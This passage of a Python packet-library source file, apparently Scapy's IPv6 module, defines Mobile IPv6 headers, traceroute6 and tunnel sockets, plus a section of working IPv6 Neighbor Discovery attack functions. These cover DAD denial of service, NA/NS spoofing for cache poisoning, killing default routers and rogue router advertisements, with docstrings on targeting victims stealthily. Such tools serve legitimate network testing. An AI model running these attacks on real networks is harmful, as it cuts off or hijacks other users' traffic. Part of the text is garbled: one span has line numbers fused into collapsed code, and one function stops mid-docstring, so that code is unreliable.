                   StrFixedLenField("reserved", b"\x00"*2, 2),
                   StrFixedLenField("cookie", b"\x00"*8, 8),
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default
                   _MobilityOptionsField("options", [], MIP6OptUnknown, 16,
                                         length_from=lambda pkt: 8*(pkt.len-1))]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        return raw(self.cookie)


class MIP6MH_CoTI(MIP6MH_HoTI):
    """Care-of Test Init message (MH type 2), same layout as HoTI."""
    name = "IPv6 Mobility Header - Care-of Test Init"
    mhtype = 2

    def hashret(self):
        return raw(self.cookie)


class MIP6MH_HoT(_MobilityHeader):
    """Home Test message (MH type 3), answer to a Home Test Init."""
    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteEnumField("mhtype", 3, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   ShortField("index", None),
                   StrFixedLenField("cookie", b"\x00"*8, 8),
                   StrFixedLenField("token", b"\x00"*8, 8),
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default
                   _MobilityOptionsField("options", [], MIP6OptUnknown, 24,
                                         length_from=lambda pkt: 8*(pkt.len-2))]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        return raw(self.cookie)

    def answers(self, other):
        """Match a HoTI carrying the same cookie."""
        if (isinstance(other, MIP6MH_HoTI) and
                self.cookie == other.cookie):
            return 1
        return 0


class MIP6MH_CoT(MIP6MH_HoT):
    """Care-of Test message (MH type 4), answer to a Care-of Test Init."""
    name = "IPv6 Mobility Header - Care-of Test"
    mhtype = 4

    def hashret(self):
        return raw(self.cookie)

    def answers(self, other):
        """Match a CoTI carrying the same cookie."""
        if (isinstance(other, MIP6MH_CoTI) and
                self.cookie == other.cookie):
            return 1
        return 0

3043class LifetimeField(ShortField): 3044 def i2repr(self, pkt, x): 3045 return "%d sec" % (4*x) 3046 3047class MIP6MH_BU(_MobilityHeader): 3048 name = "IPv6 Mobility Header - Binding Update" 3049 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 3050 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) 3051 ByteEnumField("mhtype", 5, mhtypes), 3052 ByteField("res", None), 3053 XShortField("cksum", None), 3054 XShortField("seq", None), # TODO: ShortNonceField 3055 FlagsField("flags", "KHA", 7, "PRMKLHA"), 3056 XBitField("reserved", 0, 9), 3057 LifetimeField("mhtime", 3), # unit == 4 seconds 3058 _PhantomAutoPadField("autopad", 1), # autopad activated by default 3059 _MobilityOptionsField("options", [], MIP6OptUnknown, 12, 3060 length_from = lambda pkt: 8*pkt.len - 4) ] 3061 overload_fields = { IPv6: { "nh": 135 } } 3062 3063 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 3064 return b"\x00\x08\x09" 3065 3066 def answers(self, other): 3067 if isinstance(other, MIP6MH_BRR): 3068 return 1 3069 return 0 3070 3071class MIP6MH_BA(_MobilityHeader): 3072 name = "IPv6 Mobility Header - Binding ACK" 3073 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 3074 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) 3075 ByteEnumField("mhtype", 6, mhtypes), 3076 ByteField("res", None), 3077 XShortField("cksum", None), 3078 ByteEnumField("status", 0, bastatus), 3079 FlagsField("flags", "K", 3, "PRK"), 3080 XBitField("res2", None, 5), 3081 XShortField("seq", None), # TODO: ShortNonceField 3082 XShortField("mhtime", 0), # unit == 4 seconds 3083 _PhantomAutoPadField("autopad", 1), # autopad activated by default 3084 _MobilityOptionsField("options", [], MIP6OptUnknown, 12, 3085 length_from = lambda pkt: 8*pkt.len-4) ] 3086 overload_fields = { IPv6: { "nh": 135 }} 3087 3088 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 3089 return b"\x00\x08\x09" 3090 3091 def answers(self, other): 3092 if (isinstance(other, MIP6MH_BU) 
and 3093 other.mhtype == 5 and 3094 self.mhtype == 6 and 3095 other.flags & 0x1 and # Ack request flags is set 3096 self.seq == other.seq): 3097 return 1 3098 return 0 3099 3100_bestatus = { 1: 'Unknown binding for Home Address destination option', 3101 2: 'Unrecognized MH Type value' } 3102 3103# TODO: match Binding Error to its stimulus 3104class MIP6MH_BE(_MobilityHeader): 3105 name = "IPv6 Mobility Header - Binding Error" 3106 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 3107 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) 3108 ByteEnumField("mhtype", 7, mhtypes), 3109 ByteField("res", 0), 3110 XShortField("cksum", None), 3111 ByteEnumField("status", 0, _bestatus), 3112 ByteField("reserved", 0), 3113 IP6Field("ha", "::"), 3114 _MobilityOptionsField("options", [], MIP6OptUnknown, 24, 3115 length_from = lambda pkt: 8*(pkt.len-2)) ] 3116 overload_fields = { IPv6: { "nh": 135 }} 3117 3118_mip6_mhtype2cls = { 0: MIP6MH_BRR, 3119 1: MIP6MH_HoTI, 3120 2: MIP6MH_CoTI, 3121 3: MIP6MH_HoT, 3122 4: MIP6MH_CoT, 3123 5: MIP6MH_BU, 3124 6: MIP6MH_BA, 3125 7: MIP6MH_BE } 3126 3127 3128 3129############################################################################# 3130############################################################################# 3131### Traceroute6 ### 3132############################################################################# 3133############################################################################# 3134 3135class AS_resolver6(AS_resolver_riswhois): 3136 def _resolve_one(self, ip): 3137 """ 3138 overloaded version to provide a Whois resolution on the 3139 embedded IPv4 address if the address is 6to4 or Teredo. 3140 Otherwise, the native IPv6 address is passed. 
3141 """ 3142 3143 if in6_isaddr6to4(ip): # for 6to4, use embedded @ 3144 tmp = inet_pton(socket.AF_INET6, ip) 3145 addr = inet_ntop(socket.AF_INET, tmp[2:6]) 3146 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address 3147 addr = teredoAddrExtractInfo(ip)[2] 3148 else: 3149 addr = ip 3150 3151 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) 3152 3153 if asn.startswith("AS"): 3154 try: 3155 asn = int(asn[2:]) 3156 except ValueError: 3157 pass 3158 3159 return ip,asn,desc 3160 3161class TracerouteResult6(TracerouteResult): 3162 __slots__ = [] 3163 def show(self): 3164 return self.make_table(lambda s_r: (s_r[0].sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! 3165 s_r[0].hlim, 3166 s_r[1].sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+ 3167 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+ 3168 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+ 3169 "{ICMPv6EchoReply:%ir,type%}"))) 3170 3171 def get_trace(self): 3172 trace = {} 3173 3174 for s,r in self.res: 3175 if IPv6 not in s: 3176 continue 3177 d = s[IPv6].dst 3178 if d not in trace: 3179 trace[d] = {} 3180 3181 t = not (ICMPv6TimeExceeded in r or 3182 ICMPv6DestUnreach in r or 3183 ICMPv6PacketTooBig in r or 3184 ICMPv6ParamProblem in r) 3185 3186 trace[d][s[IPv6].hlim] = r[IPv6].src, t 3187 3188 for k in six.itervalues(trace): 3189 try: 3190 m = min(x for x, y in six.itervalues(k) if y) 3191 except ValueError: 3192 continue 3193 for l in list(k): # use list(): k is modified in the loop 3194 if l > m: 3195 del k[l] 3196 3197 return trace 3198 3199 def graph(self, ASres=AS_resolver6(), **kargs): 3200 TracerouteResult.graph(self, ASres=ASres, **kargs) 3201 3202@conf.commands.register 3203def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 3204 l4 = None, timeout=2, verbose=None, **kargs): 3205 """Instant TCP traceroute using IPv6 3206 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) 
-> None 3207 """ 3208 if verbose is None: 3209 verbose = conf.verb 3210 3211 if l4 is None: 3212 a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport), 3213 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) 3214 else: 3215 a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4, 3216 timeout=timeout, verbose=verbose, **kargs) 3217 3218 a = TracerouteResult6(a.res) 3219 3220 if verbose: 3221 a.display() 3222 3223 return a,b 3224 3225############################################################################# 3226############################################################################# 3227### Sockets ### 3228############################################################################# 3229############################################################################# 3230 3231class L3RawSocket6(L3RawSocket): 3232 def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): 3233 L3RawSocket.__init__(self, type, filter, iface, promisc) 3234 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) 3235 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) 3236 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) 3237 3238def IPv6inIP(dst='203.178.135.36', src=None): 3239 _IPv6inIP.dst = dst 3240 _IPv6inIP.src = src 3241 if not conf.L3socket == _IPv6inIP: 3242 _IPv6inIP.cls = conf.L3socket 3243 else: 3244 del(conf.L3socket) 3245 return _IPv6inIP 3246 3247class _IPv6inIP(SuperSocket): 3248 dst = '127.0.0.1' 3249 src = None 3250 cls = None 3251 3252 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): 3253 SuperSocket.__init__(self, family, type, proto) 3254 self.worker = self.cls(**args) 3255 3256 def set(self, dst, src=None): 3257 _IPv6inIP.src = src 3258 _IPv6inIP.dst = dst 3259 3260 def nonblock_recv(self): 3261 p = self.worker.nonblock_recv() 3262 return self._recv(p) 3263 3264 def 
recv(self, x): 3265 p = self.worker.recv(x) 3266 return self._recv(p, x) 3267 3268 def _recv(self, p, x=MTU): 3269 if p is None: 3270 return p 3271 elif isinstance(p, IP): 3272 # TODO: verify checksum 3273 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: 3274 if isinstance(p.payload, IPv6): 3275 return p.payload 3276 return p 3277 3278 def send(self, x): 3279 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x) 3280 3281 3282############################################################################# 3283############################################################################# 3284### Neighbor Discovery Protocol Attacks ### 3285############################################################################# 3286############################################################################# 3287 3288def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 3289 tgt_filter=None, reply_mac=None): 3290 """ 3291 Internal generic helper accepting a specific callback as first argument, 3292 for NS or NA reply. See the two specific functions below. 
3293 """ 3294 3295 def is_request(req, mac_src_filter, tgt_filter): 3296 """ 3297 Check if packet req is a request 3298 """ 3299 3300 # Those simple checks are based on Section 5.4.2 of RFC 4862 3301 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 3302 return 0 3303 3304 # Get and compare the MAC address 3305 mac_src = req[Ether].src 3306 if mac_src_filter and mac_src != mac_src_filter: 3307 return 0 3308 3309 # Source must be the unspecified address 3310 if req[IPv6].src != "::": 3311 return 0 3312 3313 # Check destination is the link-local solicited-node multicast 3314 # address associated with target address in received NS 3315 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 3316 if tgt_filter and tgt != tgt_filter: 3317 return 0 3318 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) 3319 expected_snma = in6_getnsma(tgt) 3320 if received_snma != expected_snma: 3321 return 0 3322 3323 return 1 3324 3325 if not iface: 3326 iface = conf.iface 3327 3328 # To prevent sniffing our own traffic 3329 if not reply_mac: 3330 reply_mac = get_if_hwaddr(iface) 3331 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3332 3333 sniff(store=0, 3334 filter=sniff_filter, 3335 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 3336 prn=lambda x: reply_callback(x, reply_mac, iface), 3337 iface=iface) 3338 3339 3340def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, 3341 reply_mac=None): 3342 """ 3343 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3344 3756. This is done by listening incoming NS messages sent from the 3345 unspecified address and sending a NS reply for the target address, 3346 leading the peer to believe that another node is also performing DAD 3347 for that address. 3348 3349 By default, the fake NS sent to create the DoS uses: 3350 - as target address the target address found in received NS. 3351 - as IPv6 source address: the unspecified address (::). 
3352 - as IPv6 destination address: the link-local solicited-node multicast 3353 address derived from the target address in received NS. 3354 - the mac address of the interface as source (or reply_mac, see below). 3355 - the multicast mac address derived from the solicited node multicast 3356 address used as IPv6 destination address. 3357 3358 Following arguments can be used to change the behavior: 3359 3360 iface: a specific interface (e.g. "eth0") of the system on which the 3361 DoS should be launched. If None is provided conf.iface is used. 3362 3363 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3364 Only NS messages received from this source will trigger replies. 3365 This allows limiting the effects of the DoS to a single target by 3366 filtering on its mac address. The default value is None: the DoS 3367 is not limited to a specific mac address. 3368 3369 tgt_filter: Same as previous but for a specific target IPv6 address for 3370 received NS. If the target address in the NS message (not the IPv6 3371 destination address) matches that address, then a fake reply will 3372 be sent, i.e. the emitter will be a target of the DoS. 3373 3374 reply_mac: allow specifying a specific source mac address for the reply, 3375 i.e. to prevent the use of the mac address of the interface. 
3376 """ 3377 3378 def ns_reply_callback(req, reply_mac, iface): 3379 """ 3380 Callback that reply to a NS by sending a similar NS 3381 """ 3382 3383 # Let's build a reply and send it 3384 mac = req[Ether].src 3385 dst = req[IPv6].dst 3386 tgt = req[ICMPv6ND_NS].tgt 3387 rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt) 3388 sendp(rep, iface=iface, verbose=0) 3389 3390 print("Reply NS for target address %s (received from %s)" % (tgt, mac)) 3391 3392 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, 3393 tgt_filter, reply_mac) 3394 3395 3396def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, 3397 reply_mac=None): 3398 """ 3399 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3400 3756. This is done by listening incoming NS messages *sent from the 3401 unspecified address* and sending a NA reply for the target address, 3402 leading the peer to believe that another node is also performing DAD 3403 for that address. 3404 3405 By default, the fake NA sent to create the DoS uses: 3406 - as target address the target address found in received NS. 3407 - as IPv6 source address: the target address found in received NS. 3408 - as IPv6 destination address: the link-local solicited-node multicast 3409 address derived from the target address in received NS. 3410 - the mac address of the interface as source (or reply_mac, see below). 3411 - the multicast mac address derived from the solicited node multicast 3412 address used as IPv6 destination address. 3413 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled 3414 with the mac address used as source of the NA. 3415 3416 Following arguments can be used to change the behavior: 3417 3418 iface: a specific interface (e.g. "eth0") of the system on which the 3419 DoS should be launched. If None is provided conf.iface is used. 3420 3421 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 
3422 Only NS messages received from this source will trigger replies. 3423 This allows limiting the effects of the DoS to a single target by 3424 filtering on its mac address. The default value is None: the DoS 3425 is not limited to a specific mac address. 3426 3427 tgt_filter: Same as previous but for a specific target IPv6 address for 3428 received NS. If the target address in the NS message (not the IPv6 3429 destination address) matches that address, then a fake reply will 3430 be sent, i.e. the emitter will be a target of the DoS. 3431 3432 reply_mac: allow specifying a specific source mac address for the reply, 3433 i.e. to prevent the use of the mac address of the interface. This 3434 address will also be used in the Target Link-Layer Address option. 3435 """ 3436 3437 def na_reply_callback(req, reply_mac, iface): 3438 """ 3439 Callback that reply to a NS with a NA 3440 """ 3441 3442 # Let's build a reply and send it 3443 mac = req[Ether].src 3444 dst = req[IPv6].dst 3445 tgt = req[ICMPv6ND_NS].tgt 3446 rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst) 3447 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) 3448 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 3449 sendp(rep, iface=iface, verbose=0) 3450 3451 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 3452 3453 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, 3454 tgt_filter, reply_mac) 3455 3456 3457def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, 3458 reply_mac=None, router=False): 3459 """ 3460 The main purpose of this function is to send fake Neighbor Advertisement 3461 messages to a victim. As the emission of unsolicited Neighbor Advertisement 3462 is pretty pointless (from an attacker standpoint) because it will not 3463 lead to a modification of a victim's neighbor cache, the function send 3464 advertisements in response to received NS (NS sent as part of the DAD, 3465 i.e. with an unspecified address as source, are not considered). 
3466 3467 By default, the fake NA sent to create the DoS uses: 3468 - as target address the target address found in received NS. 3469 - as IPv6 source address: the target address 3470 - as IPv6 destination address: the source IPv6 address of received NS 3471 message. 3472 - the mac address of the interface as source (or reply_mac, see below). 3473 - the source mac address of the received NS as destination macs address 3474 of the emitted NA. 3475 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) 3476 filled with the mac address used as source of the NA. 3477 3478 Following arguments can be used to change the behavior: 3479 3480 iface: a specific interface (e.g. "eth0") of the system on which the 3481 DoS should be launched. If None is provided conf.iface is used. 3482 3483 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3484 Only NS messages received from this source will trigger replies. 3485 This allows limiting the effects of the DoS to a single target by 3486 filtering on its mac address. The default value is None: the DoS 3487 is not limited to a specific mac address. 3488 3489 tgt_filter: Same as previous but for a specific target IPv6 address for 3490 received NS. If the target address in the NS message (not the IPv6 3491 destination address) matches that address, then a fake reply will 3492 be sent, i.e. the emitter will be a target of the DoS. 3493 3494 reply_mac: allow specifying a specific source mac address for the reply, 3495 i.e. to prevent the use of the mac address of the interface. This 3496 address will also be used in the Target Link-Layer Address option. 3497 3498 router: by the default (False) the 'R' flag in the NA used for the reply 3499 is not set. If the parameter is set to True, the 'R' flag in the 3500 NA is set, advertising us as a router. 3501 3502 Please, keep the following in mind when using the function: for obvious 3503 reasons (kernel space vs. 
Python speed), when the target of the address 3504 resolution is on the link, the sender of the NS receives 2 NA messages 3505 in a row, the valid one and our fake one. The second one will overwrite 3506 the information provided by the first one, i.e. the natural latency of 3507 Scapy helps here. 3508 3509 In practice, on a common Ethernet link, the emission of the NA from the 3510 genuine target (kernel stack) usually occurs in the same millisecond as 3511 the receipt of the NS. The NA generated by Scapy6 will usually come after 3512 something 20+ ms. On a usual testbed for instance, this difference is 3513 sufficient to have the first data packet sent from the victim to the 3514 destination before it even receives our fake NA. 3515 """ 3516 3517 def is_request(req, mac_src_filter, tgt_filter): 3518 """ 3519 Check if packet req is a request 3520 """ 3521 3522 # Those simple checks are based on Section 5.4.2 of RFC 4862 3523 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 3524 return 0 3525 3526 mac_src = req[Ether].src 3527 if mac_src_filter and mac_src != mac_src_filter: 3528 return 0 3529 3530 # Source must NOT be the unspecified address 3531 if req[IPv6].src == "::": 3532 return 0 3533 3534 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 3535 if tgt_filter and tgt != tgt_filter: 3536 return 0 3537 3538 dst = req[IPv6].dst 3539 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. 3540 3541 # If this is a real address resolution NS, then the destination 3542 # address of the packet is the link-local solicited node multicast 3543 # address associated with the target of the NS. 3544 # Otherwise, the NS is a NUD related one, i.e. 
the peer is 3545 # unicasting the NS to check the target is still alive (L2 3546 # information is still in its cache and it is verified) 3547 received_snma = socket.inet_pton(socket.AF_INET6, dst) 3548 expected_snma = in6_getnsma(tgt) 3549 if received_snma != expected_snma: 3550 print("solicited node multicast @ does not match target @!") 3551 return 0 3552 3553 return 1 3554 3555 def reply_callback(req, reply_mac, router, iface): 3556 """ 3557 Callback that reply to a NS with a spoofed NA 3558 """ 3559 3560 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and 3561 # send it back. 3562 mac = req[Ether].src 3563 pkt = req[IPv6] 3564 src = pkt.src 3565 tgt = req[ICMPv6ND_NS].tgt 3566 rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src) 3567 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS 3568 3569 # "If the solicitation IP Destination Address is not a multicast 3570 # address, the Target Link-Layer Address option MAY be omitted" 3571 # Given our purpose, we always include it. 
3572 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 3573 3574 sendp(rep, iface=iface, verbose=0) 3575 3576 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 3577 3578 if not iface: 3579 iface = conf.iface 3580 # To prevent sniffing our own traffic 3581 if not reply_mac: 3582 reply_mac = get_if_hwaddr(iface) 3583 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3584 3585 router = (router and 1) or 0 # Value of the R flags in NA 3586 3587 sniff(store=0, 3588 filter=sniff_filter, 3589 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 3590 prn=lambda x: reply_callback(x, reply_mac, router, iface), 3591 iface=iface) 3592 3593 3594def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", 3595 dst=None, src_mac=None, dst_mac=None, loop=True, 3596 inter=1, iface=None): 3597 """ 3598 The main purpose of this function is to send fake Neighbor Solicitations 3599 messages to a victim, in order to either create a new entry in its neighbor 3600 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated 3601 that a node SHOULD create the entry or update an existing one (if it is not 3602 currently performing DAD for the target of the NS). The entry's reachability 3603 state is set to STALE. 3604 3605 The two main parameters of the function are the source link-layer address 3606 (carried by the Source Link-Layer Address option in the NS) and the 3607 source address of the packet. 3608 3609 Unlike some other NDP_Attack_* function, this one is not based on a 3610 stimulus/response model. When called, it sends the same NS packet in loop 3611 every second (the default) 3612 3613 Following arguments can be used to change the format of the packets: 3614 3615 src_lladdr: the MAC address used in the Source Link-Layer Address option 3616 included in the NS packet. This is the address that the peer should 3617 associate in its neighbor cache with the IPv6 source address of the 3618 packet. 
If None is provided, the mac address of the interface is 3619 used. 3620 3621 src: the IPv6 address used as source of the packet. If None is provided, 3622 an address associated with the emitting interface will be used 3623 (based on the destination address of the packet). 3624 3625 target: the target address of the NS packet. If no value is provided, 3626 a dummy address (2001:db8::1) is used. The value of the target 3627 has a direct impact on the destination address of the packet if it 3628 is not overridden. By default, the solicited-node multicast address 3629 associated with the target is used as destination address of the 3630 packet. Consider specifying a specific destination address if you 3631 intend to use a target address different than the one of the victim. 3632 3633 dst: The destination address of the NS. By default, the solicited node 3634 multicast address associated with the target address (see previous 3635 parameter) is used if no specific value is provided. The victim 3636 is not expected to check the destination address of the packet, 3637 so using a multicast address like ff02::1 should work if you want 3638 the attack to target all hosts on the link. On the contrary, if 3639 you want to be more stealth, you should provide the target address 3640 for this parameter in order for the packet to be sent only to the 3641 victim. 3642 3643 src_mac: the MAC address used as source of the packet. By default, this 3644 is the address of the interface. If you want to be more stealth, 3645 feel free to use something else. Note that this address is not the 3646 that the victim will use to populate its neighbor cache. 3647 3648 dst_mac: The MAC address used as destination address of the packet. If 3649 the IPv6 destination address is multicast (all-nodes, solicited 3650 node, ...), it will be computed. If the destination address is 3651 unicast, a neighbor solicitation will be performed to get the 3652 associated address. 
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    The purpose of the function is to monitor incoming RA messages
    sent by default routers (RA with a non-zero Router Lifetime value)
    and invalidate them by immediately replying with fake RA messages
    advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and the destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to allow
    filtering RA sent by specific routers (Ethernet source address).
    With regard to emission, the multicast all-nodes address is used
    by default but a specific target can be used, in order for the DoS to
    apply only to a specific host.

    More precisely, the following arguments can be used to change the
    behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided, conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will trigger
         replies. If other default routers advertised their presence on the
         link, their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific IPv6 source
         address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Return 1 if req is an RA from a default router that matches the
        optional Ethernet/IPv6 source filters, 0 otherwise.
        """

        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        ip_src = req[IPv6].src
        if ip_src_filter and ip_src != ip_src_filter:
            return 0

        # Check if this is an advertisement for a Default Router
        # by looking at Router Lifetime value
        if req[ICMPv6ND_RA].routerlifetime == 0:
            return 0

        return 1

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Callback that answers the RA found in req with a forged RA carrying
        a zero Router Lifetime, the same Prefix Information options and a
        Source Link-Layer Address option.
        """

        src = req[IPv6].src

        # Prepare packets parameters
        ether_params = {}
        if reply_mac:
            ether_params["src"] = reply_mac

        if tgt_mac:
            ether_params["dst"] = tgt_mac

        # Pick the link-layer address to advertise *before* extracting the
        # PIOs: the loop below deletes the payload of layers that belong to
        # req, which cuts req right after its first PIO. Looking the option
        # up afterwards would miss a Source Link-Layer Address option placed
        # behind a PIO and silently fall back to the Ethernet source.
        if ICMPv6NDOptSrcLLAddr in req:
            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            mac = req[Ether].src

        # Basis of fake RA (high pref, zero lifetime)
        rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)

        # Add every PIO from the request, each one stripped from whatever
        # followed it ...
        tmp = req
        while ICMPv6NDOptPrefixInfo in tmp:
            pio = tmp[ICMPv6NDOptPrefixInfo]
            tmp = pio.payload
            del(pio.payload)
            rep /= pio

        # ... and the source link layer address option
        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)

        sendp(rep, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % src)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
          iface=iface)
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Send the provided RA message at layer 2 (i.e. a packet starting with
    IPv6 will not work) each time an RS message is seen on the link. In the
    end, the function is a simple wrapper around sendp() that monitors the
    link for RS messages.

    It is probably better explained with an example:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    The following arguments can be used to change the behavior:

      ra: the RA message to send in response to a received RS message.

      iface: a specific interface (e.g. "eth0") of the system on which the
             DoS should be launched. If none is provided, conf.iface is
             used.

      mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RS messages received from this source will trigger a reply.
         Note that the provided RA is sent unchanged, which implies that if
         you intend to target only the source of the RS using this option,
         you will have to set the Ethernet destination address to the same
         value in your RA.
         The default value for this parameter is None: no filtering on the
         source of RS is done.

      ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RS messages received from this source address will trigger
         replies. The same comment as for the previous argument applies: if
         you use the option, you will probably want to set a specific
         Ethernet destination address in the RA.
    """

    def wants_reply(pkt):
        """
        Return 1 if pkt is an RS matching the optional source filters,
        0 otherwise.
        """
        if Ether not in pkt or IPv6 not in pkt or ICMPv6ND_RS not in pkt:
            return 0
        if mac_src_filter and pkt[Ether].src != mac_src_filter:
            return 0
        if ip_src_filter and pkt[IPv6].src != ip_src_filter:
            return 0
        return 1

    def answer_rs(pkt):
        """
        Send the caller-provided RA and report which RS triggered it.
        """
        rs_source = pkt[IPv6].src
        sendp(ra, iface=iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % rs_source)

    iface = iface or conf.iface

    sniff(store=0,
          filter="icmp6",
          lfilter=wants_reply,
          prn=answer_rs,
          iface=iface)


#############################################################################
#############################################################################
###                          Layers binding                               ###
#############################################################################
#############################################################################

# Register the IPv6 dissectors in the layer 3 / layer 2 type tables.
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, _IPv46)
